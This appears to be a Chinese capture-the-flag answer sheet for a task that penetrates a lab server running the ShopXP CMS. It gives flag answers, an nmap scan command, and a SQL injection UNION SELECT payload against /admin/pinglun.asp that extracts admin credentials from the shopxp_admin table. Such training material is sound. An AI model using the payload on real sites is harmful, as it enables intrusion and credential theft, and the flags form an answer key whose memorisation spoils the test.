B-5:CMS网站渗透
任务环境说明:
- 服务器场景:Server2206(关闭链接)
- 服务器场景操作系统:未知
1.使用渗透机对服务器信息收集,并将服务器中网站服务端口号作为flag提交;
2.使用渗透机对服务器信息收集,将网站的名称作为flag提交;
3.使用渗透机对服务器渗透,将可渗透页面的名称作为flag提交;
4.使用渗透机对服务器渗透,并将网站中所用的数据库的表名作为flag提交;
5.使用渗透机对服务器渗透,将网站管理员的加密密码作为flag提交;
6.使用渗透机对服务器渗透,将服务器的本地名称作为flag提交。
1.使用渗透机对服务器信息收集,并将服务器中网站服务端口号作为flag提交;
2.使用渗透机对服务器信息收集,将网站的名称作为flag提交;
flag{SHOPXP.cn}
3.使用渗透机对服务器渗透,将可渗透页面的名称作为flag提交;
ShopXP购物系统爆高危安全漏洞 SCANV团队独家提供解决方案_shopxp扫描抓包-CSDN博客
sql注入漏洞存在于/admin/pinglun.asp文件
flag{pinglun.asp}
4.使用渗透机对服务器渗透,并将网站中所用的数据库的表名作为flag提交;
?id=1 union select 1,2,admin,4,5,password,7,8,9,10,11 from shopxp_admin
flag{shopxp_admin}
5.使用渗透机对服务器渗透,将网站管理员的加密密码作为flag提交;
flag{7a57a5a743894a0e}
6.使用渗透机对服务器渗透,将服务器的本地名称作为flag提交。
nmap -O -A
flag{workgrou-sypyia}